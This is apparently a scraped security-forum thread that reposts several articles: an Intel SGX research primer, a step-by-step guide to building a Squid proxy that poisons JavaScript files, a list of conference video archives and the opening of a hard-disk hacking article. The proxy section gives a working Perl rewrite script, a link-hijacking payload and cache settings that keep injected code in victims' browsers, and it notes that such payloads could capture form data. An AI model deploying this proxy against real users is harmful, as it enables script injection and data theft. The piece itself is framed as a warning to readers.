Intel SGX to defend against privileged code and physical attacks such as memory probes, but also addresses the dual challenges of executing unmodified legacy binaries and protecting them from a malicious host. This work motivated recent changes in the SGX specification. Further Applications Two other papers that are related to how SGX can be applied are (both from Intel): Using Innovative Instructions to Create Trustworthy Software Solutions Innovative Technology for CPU Based Attestation and Sealing Finally there was some speculation that Ubuntu’s LXD announced early November 2014 might use SGX: Ubuntu do state that: We’re working with silicon companies to ensure hardware-assisted security and isolation for these containers, just like virtual machines today. Emulator and CPU Support Status By now you will no doubt be salivating at the prospect of SGX and want to proto-type: New first of its kind malware which uses SGX in preparation for BlackHat USA 2015 OR A Soft-HSM OR DRM extensions which use SGX So what is the status of emulator and CPU support for SGX? Emulators Alas no emulators are available to public, although one does exist inside of Intel and shared with select partners. In June 2014 Intel said in the comments section of the Intel® SGX for Dummies (Intel® SGX Design Objectives) blog post: Intel is not ready to announce plans for availability of SGX emulation platform yet, but this forum will be updated when we are ready. So how did Microsoft develop their VC3 and Haven proto-types? In the Microsoft VC3 paper from February 2014 Microsoft said: We successfully tested our implementation in an SGX emulator provided by Intel More interestingly they then go on to say: However, since that emulator is not performance accurate, we have implemented our own software emulator for SGX. Our goal was to use SGX as specified in [31] as a concrete basis for our VC3 implementation and to obtain realistic estimates for how SGX would impact the performance of VC3. Our software emulator does not attempt to provide security guarantees. The emulator is implemented as a Windows driver. It hooks the KiDebugRoutine function pointer in the Windows kernel that is invoked on every exception received by the kernel. Execution of an SGX opcode from [31] will generate an illegal instruction exception on existing processors, upon which the kernel will invoke our emulator via a call to KiDebugRoutine. The emulator contains handler functions for all SGX instructions used by VC3, including EENTER, EEXIT, EGETKEY, EREPORT, ECREATE, EADD, EEXTEND, and EINIT. We use the same mechanism to handle accesses to model specific registers (MSR) and control registers as specified in [31]. We also modified the SwapContext function in the Windows kernel to ensure that the full register context is loaded correctly during enclave execution. In Microsoft Haven research in October 2014 they said: We developed Haven on an instruction-accurate SGX emulator provided by Intel, but evaluate it using our own model of SGX performance. Haven goes beyond the original design intent of SGX, so while the hardware was mostly sufficient, it did have three fundamental limitations for which we proposed fixes (§5.4). These are incorporated in a revised version of the SGX specification, published concurrently by Intel. Note: The revised version they refer to is Rev 2 of the Intel® Software Guard Extensions Programming Reference. Aside from this there was a project at Georgia Institute of Technology to add Intel SGX Emulation using QEMU which they appear to have achieved between their plan presentation on October 20, 2014 and their summary presentation on December 1, 2014. However a quick search of the QEMU commits finds no reference to their commits. CPU Support Currently there is no CPU on the market which supports the SGX or SGX2 instruction set. Future Security Research So first off from reading the programming reference some initial questions would be: Do the 'SGX Enclave Control Structures' (SECS) have their integrity ensured? The SECSs contain meta-data used by the CPU to protect the enclave and will thus be a prime target. Do the 'Thread Control Structures' (TCS) have their integrity ensured? The TCSs contain meta-data used by the hardware to save and restore thread specific information when entering / exiting the enclave. Does the 'Enclave Page Cache Map' (EPCM) have its integrity ensured? The EPCM is used to keep track of which bits of memory are in the 'Enclave Page Cache' (EPC) and is 'managed by the processor'. The reason for the above questions are in part driven by the obvious but also by the fact that Intel mention that they stop certain concurrent operations to protect the integrity of these structures. Also it is important to differentiate between integrity provided by the Memory Encryption Engine (MEE – more on this later as it provides external memory modification protection) and that afforded by the microcode operating on them. In the presentation Dynamic Root of Trust and Trusted Execution we see that MEE does provide integrity protection from external modification: Some other questions which spring to mind also include: What are the algorithm and key generation mechanism for the 'Enclave Page Cache' (EPC)? The EPC is the RAM used by the secure enclaves. Where it is part of the RAM they are protected by an encryption engine. The whole debug problem. If you compromise or own the underlying OS before attestation of the enclave has occurred then there is likely the obvious bootstrap problem and where the Trusted Computing Base (TCB) is designed to help. This is also where remote attestation (as discussed by Joanna Rutkowska) will become critical to make sure that the aggressor has pre-owned the environment allowing them to catch the provisioning process within the supposed secure enclave. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 177 Aside from the topics mentioned it is clear that the value of any microcode vulnerability or errata that allow subversion. For example the diagram below shows Processor Reserved Memory (PRM) which is used to house some of the structures mentioned in the question section. Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 40 How is integrity of the memory ensured in the EPC implementation? Looking at this related patent Parallelized counter tree walk for low overhead memory replay protection As the lower-level counters (including L2, LI and L0 counters and the version nodes 260) are off the processor die and therefore are susceptible to attacks, each counter and each version node are encoded with an embedded Message Authentication Code (MAC) (shown as the blocks with hatched lines) to ensure their integrity. In one embodiment, each embedded MAC is computed over the line in which they are embedded, using a corresponding counter from the next higher level as input. In the example of Figure 2, the embedded MAC for the version block 250 associated with L03 (shown in Figure 2 as the middle version block) is computed using the values of Vo - Vp and its corresponding L0 counter (LO3). The value of this embedded MAC is stored striped in the line of the version blocks 250 (shown as striped boxes in Figure 2). The embedded MAC for each line of L0, LI and L2 is computed similarly. L3 counters do not need embedded MACs because the contents of L3 counters are within the trusted boundary 205. Finally, from a defensive standpoint the impact on memory forensics and similar techniques is likely going to be substantial. Understanding the finer details will become critical. Conclusions Intel SGX is an interesting technology for numerous parties both good and bad outside of DRM. However, it is also clear that there is enough small print that the implementations across all families of CPU will warrant investigation when they become generally available. From a vulnerability/attack research perspective vulnerabilities in enclave protected code (including brokers) as well as CPU microcode will become incredibly valuable as will any attestation aspects. There will likely be renewed focus on understanding the exploitability of issues noted in Intel CPU Errata to potentially subvert or other influence control of an enclave. From a defensive standpoint cloud and sensitive compartmentalised client side operations become feasible without reliance on the security of underlying hypervisors or the performance / usability trade-offs of homomorphic encryption. Finally imagine a world where LSASS on Microsoft Windows runs in an SGX enclave so even certain attacks implemented by Mimikatz are no longer possible. Sursa: https://www.nccgroup.com/en/blog/2015/01/intel-software-guard-extensions-sgx-a-researchers-primer/#
  23. Why are free proxies free? because it's an easy way to infect thousands of users and collect their data Posted by Christian Haschek on 29.05.13 © Anonymous wallpaper I recently stumbled across a of Chema Alonso from the Defcon 20 Conference where he was talking about how he created a Javascript botnet from scratch and how he used it to find scammers and hackers. Everything is done via a stock SQUID proxy with small config changes. The idea is pretty simple: [server] Install Squid on a linux server [Payload] Modify the server so all transmitted javascript files will get one extra piece of code that does things like send all data entered in forms to your server [Cache] Set the caching time of the modified .js files as high as possible https This technique also works with https if the site loads unsafe resources (eg. jquery from a http site). Most browsers will tell you that, some might even block the content but usually nobody gives attention to the "lock" symbol. To put it simple Safe: Unsafe: In the presentation Chema said he posted the IP of the modified server on the web and after a few days there were over 5000 people using his proxy. Most people used it for bad things because everyone knows you're only anonymous in the web when you've got a proxy and it looks like many people don't think that the proxy could do something bad to them. I was wondering if it really is that simple so I took a VM running Debian and tried implementing the concept myself Make your own js infecting proxy I assume that you have a squid proxy running and also you'll need a webserver like Apache using /var/www as web root directory (which is the default) Step 1: Create a payload For the payload I'll use a simple script that takes all links of a webpage and rewrites the href (link) attribute to my site. /etc/squid/payload.js for(var i=0;i<document.getElementsByTagName('a').length;i++) document.getElementsByTagName('a')[i].href = "https://blog.haschek.at"; [B] Step 2: Write the script that poisons all requested .js files /etc/squid/poison.pl #!/usr/bin/perl $|=1; $count = 0; $pid = $$; while(<>) { chomp $_; if($_ =- /(.*\.js)/i) { $url = $1; system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url"); system("chmod o+r /var/www/tmp/$pid-$count.js"); system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js"); print "http://127.0.0.1:80/tmp/$pid-$count.js\n"; } else { print "$_\n"; } $count++; } This script uses wget to retrieve the original javascript file of the page the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which contains our payload now) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored. Step 3: Tell Squid to use the script above in /etc/squid/squid.conf add url_rewrite_program /etc/squid/poison.pl Step 4: Never let the cache expire /var/www/tmp/.htaccess ExpiresActive On ExpiresDefault "access plus 3000 days" These lines tell the apache server to give it an insanely long expiration(caching) time so it will be in the browser of the user until they're cleaning their cookies/caches One more restart of squid and you're good to go. If you're connecting to the proxy and try to surf on any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy the cached js files will most likely be still in their caches. In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy but with creative payloads all sorts of things could be implemented. Tell your friends never to use free proxies because many hosts do things like that. Be safe on the web (but not with free proxies) Sursa: https://blog.haschek.at/post/fd9bc
  24. Video archives of security conferences Just some links for your enjoyment List of security conferences in 2014 Video archives: Blackhat 2012 Botconf 2013 Bsides Bsides Cleveland 2012 BsidesCLE Chaos Communication Congress Chaos Communications Channel YouTube 31c3 Recordings Defcon Defcon: All Conference CDs and DVDs with Presentation PDF files (updated 2014 for DEF CON 22): Torrent Defcon: all other Derbycon Digital Bond's S4x14 Digital Bond's S4x14 ISC Security Circle City Con GrrCON Information Security Summit & Hacker Conference Hack in the box HITB 2011 InfowarCon InfowarCon 2014 Free and Open Source Software Conference 2014 froscon2014 International Cyber Security Conference KIACS Cyber Security Conference KIACS 2014 Louisville NATO Cyber Security Conference Notacon Notacon 2013 Nullcon Nullcon 2014 Nullcon 2013 Nullcon 2012 OWASP AppSec EU Research 2013 AppSecUSA 2012 AppSecUSA 2011 RSA Videos Ruxcon Shmoocon Shmoocon 2014 Troopers OISF OHM OHM2013. Observe, Hack, Make Special thanks to Adrian Crenshaw for his collection of videos Posted by Mila Sursa: contagio: Video archives of security conferences
  25. Hard disk hacking - Intro Intro Apart from this article, I also gave a talk at OHM2013 about this subject. The video of that talk (minus the first few minutes) is now online. Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders. If you look at an HD from that naive standpoint, you would think the hardware should be pretty simple: all you need is something that connects to a SATA-port which can then position the read/write-head and read or write data from or to the platters. But maybe more is involved: don't hard disks also handle bad block management and SMART attributes, and don't they usually have some cache they must somehow manage? All that implies there's some intelligence in an hard disk, and intelligence usually implies hackability. I'm always interested in hackability, so I decided I wanted to look into how hard disks work on the non-mechanical level. Research like this has been done before for various bits of hardware: from PCI extension cards to embedded controllers in laptops to even Apple keyboards. Usually the research has been done in order to prove the hackability of these devices can lead to compromised software, so I decided to take the same approach: for this hack, I wanted to make a hard disk that could bypass software security. Articol complet: Sprites mods - Hard disk hacking - Intro
×
×
  • Create New...